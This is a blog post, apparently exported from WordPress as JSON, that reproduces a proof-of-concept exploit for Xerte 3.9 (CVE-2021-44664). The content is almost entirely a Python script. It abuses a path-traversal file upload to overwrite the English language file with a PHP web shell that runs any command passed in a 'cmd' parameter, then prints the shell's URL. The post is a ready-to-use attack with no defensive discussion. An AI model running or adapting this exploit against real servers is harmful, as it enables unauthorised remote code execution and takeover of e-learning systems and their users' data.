# Exploit Title: Xerte 3.9 – Remote Code Execution (RCE) (Authenticated)
\n# Date: 05\/03\/2021
\n# Exploit Author: Rik Lutz
\n# Vendor Homepage: https:\/\/xerte.org.uk
\n# Software Link: https:\/\/github.com\/thexerteproject\/xerteonlinetoolkits\/archive\/refs\/heads\/3.8.5-33.zip
\n# Version: up until version 3.9
\n# Tested on: Windows 10 XAMP
\n# CVE : CVE-2021-44664<\/p>\n
# This PoC assumes guest login is enabled and the en-GB langues files are used.
\n# This PoC wil overwrite the existing langues file (.inc) for the englisch index page with a shell.
\n# Vulnerable url: https:\/\/<host>\/website_code\/php\/import\/fileupload.php
\n# The mediapath variable can be used to set the destination of the uploaded.
\n# Create new project from template -> visit “Properties” (! symbol) -> Media and Quota<\/p>\n
import requests
\nimport re<\/p>\n
xerte_base_url = “http:\/\/127.0.0.1”
\nphp_session_id = “” # If guest is not enabled, and you have a session ID. Put it here.<\/p>\n
with requests.Session() as session:
\n# Get a PHP session ID
\nif not php_session_id:
\nsession.get(xerte_base_url)
\nelse:
\nsession.cookies.set(“PHPSESSID”, php_session_id)<\/p>\n
# Use a default template
\ndata = {
\n‘tutorialid’: ‘Nottingham’,
\n‘templatename’: ‘Nottingham’,
\n‘tutorialname’: ‘exploit’,
\n‘folder_id’: ”
\n}<\/p>\n
# Create a new project in order to find the install path
\ntemplate_id = session.post(xerte_base_url + ‘\/website_code\/php\/templates\/new_template.php’, data=data)<\/p>\n
# Find template ID
\ndata = {
\n‘template_id’: re.findall(‘(\\d+)’, template_id.text)[0]\n}<\/p>\n
# Find the install path:
\ninstall_path = session.post(xerte_base_url + ‘\/website_code\/php\/properties\/media_and_quota_template.php’, data=data)
\ninstall_path = re.findall(‘mediapath” value=”(.+?)”‘, install_path.text)[0]\n
headers = {
\n‘User-Agent’: ‘Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko\/20100101 Firefox\/94.0’,
\n‘Accept’: ‘text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8’,
\n‘Accept-Language’: ‘nl,en-US;q=0.7,en;q=0.3’,
\n‘Content-Type’: ‘multipart\/form-data; boundary=—————————170331411929658976061651588978’,
\n}<\/p>\n
# index.inc file
\ndata = \\
\n”’—————————–170331411929658976061651588978
\nContent-Disposition: form-data; name=”filenameuploaded”; filename=”index.inc”
\nContent-Type: application\/octet-stream<\/p>\n
<?php
\nif(isset($_REQUEST[\\’cmd\\’])){ echo “<pre>”; $cmd = ($_REQUEST[\\’cmd\\’]); system($cmd); echo “<\/pre>”; die; }
\n\/**
\n*
\n* index.php english language file
\n*
\n* @author Patrick Lockley
\n* @version 1.0
\n* @copyright Pat Lockley
\n* @package
\n*\/<\/p>\n
define(“INDEX_USERNAME_AND_PASSWORD_EMPTY”, “Please enter your username and password”);<\/p>\n
define(“INDEX_USERNAME_EMPTY”, “Please enter your username”);<\/p>\n
define(“INDEX_PASSWORD_EMPTY”, “Please enter your password”);<\/p>\n
define(“INDEX_LDAP_MISSING”, “PHP\\’s LDAP library needs to be installed to use LDAP authentication. If you read the install guide other options are available”);<\/p>\n
define(“INDEX_SITE_ADMIN”, “Site admins should log on on the manangement page”);<\/p>\n
define(“INDEX_LOGON_FAIL”, “Sorry that password combination was not correct”);<\/p>\n
define(“INDEX_LOGIN”, “login area”);<\/p>\n
define(“INDEX_USERNAME”, “Username”);<\/p>\n
define(“INDEX_PASSWORD”, “Password”);<\/p>\n
define(“INDEX_HELP_TITLE”, “Getting Started”);<\/p>\n
define(“INDEX_HELP_INTRODUCTION”, “We\\’ve produced a short introduction to the Toolkits website.”);<\/p>\n
define(“INDEX_HELP_INTRO_LINK_TEXT”,”Show me!”);<\/p>\n
define(“INDEX_NO_LDAP”,”PHP\\’s LDAP library needs to be installed to use LDAP authentication. If you read the install guide other options are available”);<\/p>\n
define(“INDEX_FOLDER_PROMPT”,”What would you like to call your folder?”);<\/p>\n
define(“INDEX_WORKSPACE_TITLE”,”My Projects”);<\/p>\n
define(“INDEX_CREATE”,”Project Templates”);<\/p>\n
define(“INDEX_DETAILS”,”Project Details”);<\/p>\n
define(“INDEX_SORT”,”Sort”);<\/p>\n
define(“INDEX_SEARCH”,”Search”);<\/p>\n
define(“INDEX_SORT_A”,”Alphabetical A-Z”);<\/p>\n
define(“INDEX_SORT_Z”,”Alphabetical Z-A”);<\/p>\n
define(“INDEX_SORT_NEW”,”Age (New to Old)”);<\/p>\n
define(“INDEX_SORT_OLD”,”Age (Old to New)”);<\/p>\n
define(“INDEX_LOG_OUT”,”Log out”);<\/p>\n
define(“INDEX_LOGGED_IN_AS”,”Logged in as”);<\/p>\n
define(“INDEX_BUTTON_LOGIN”,”Login”);<\/p>\n
define(“INDEX_BUTTON_LOGOUT”,”Logout”);<\/p>\n
define(“INDEX_BUTTON_PROPERTIES”,”Properties”);<\/p>\n
define(“INDEX_BUTTON_EDIT”,”Edit”);<\/p>\n
define(“INDEX_BUTTON_PREVIEW”, “Preview”);<\/p>\n
define(“INDEX_BUTTON_SORT”, “Sort”);<\/p>\n
define(“INDEX_BUTTON_NEWFOLDER”, “New Folder”);<\/p>\n
define(“INDEX_BUTTON_NEWFOLDER_CREATE”, “Create”);<\/p>\n
define(“INDEX_BUTTON_DELETE”, “Delete”);<\/p>\n
define(“INDEX_BUTTON_DUPLICATE”, “Duplicate”);<\/p>\n
define(“INDEX_BUTTON_PUBLISH”, “Publish”);<\/p>\n
define(“INDEX_BUTTON_CANCEL”, “Cancel”);<\/p>\n
define(“INDEX_BUTTON_SAVE”, “Save”);<\/p>\n
define(“INDEX_XAPI_DASHBOARD_FROM”, “From:”);<\/p>\n
define(“INDEX_XAPI_DASHBOARD_UNTIL”, “Until:”);<\/p>\n
define(“INDEX_XAPI_DASHBOARD_GROUP_SELECT”, “Select group:”);<\/p>\n
define(“INDEX_XAPI_DASHBOARD_GROUP_ALL”, “All groups”);<\/p>\n
define(“INDEX_XAPI_DASHBOARD_SHOW_NAMES”, “Show names and\/or email addresses”);<\/p>\n
define(“INDEX_XAPI_DASHBOARD_CLOSE”, “Close dashboard”);<\/p>\n
define(“INDEX_XAPI_DASHBOARD_DISPLAY_OPTIONS”, “Display options”);<\/p>\n
define(“INDEX_XAPI_DASHBOARD_SHOW_HIDE_COLUMNS”, “Show \/ hide columns”);<\/p>\n
define(“INDEX_XAPI_DASHBOARD_QUESTION_OVERVIEW”, “Interaction overview”);<\/p>\n
define(“INDEX_XAPI_DASHBOARD_PRINT”, “Print”);
\n\\r
\n\\r
\n—————————–170331411929658976061651588978
\nContent-Disposition: form-data; name=”mediapath”<\/p>\n
”’ \\
\n+ install_path \\
\n+ ”’..\/..\/..\/languages\/en-GB\/
\n—————————–170331411929658976061651588978–\\r
\n”’<\/p>\n
# Overwrite index.inc file
\nresponse = session.post(xerte_base_url + ‘\/website_code\/php\/import\/fileupload.php’, headers=headers, data=data)
\nprint(‘Installation path: ‘ + install_path)
\nprint(response.text)
\nif “success” in response.text:
\nprint(“Visit shell @: ” + xerte_base_url + ‘\/?cmd=whoami’)<\/p>\n","protected":false},"excerpt":{"rendered":"
# Exploit Title: Xerte 3.9 – Remote Code Execution (RCE) (Authenticated) # Date: 05\/03\/2021 # Exploit Author: Rik Lutz # Vendor Homepage: https:\/\/xerte.org.uk # Software Link: https:\/\/github.com\/thexerteproject\/xerteonlinetoolkits\/archive\/refs\/heads\/3.8.5-33.zip # Version: up until version 3.9 # Tested on: Windows 10 XAMP # CVE : CVE-2021-44664 # This PoC assumes guest login is enabled and the en-GB langues …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-21200","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21200","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=21200"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21200\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=21200"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=21200"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=21200"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}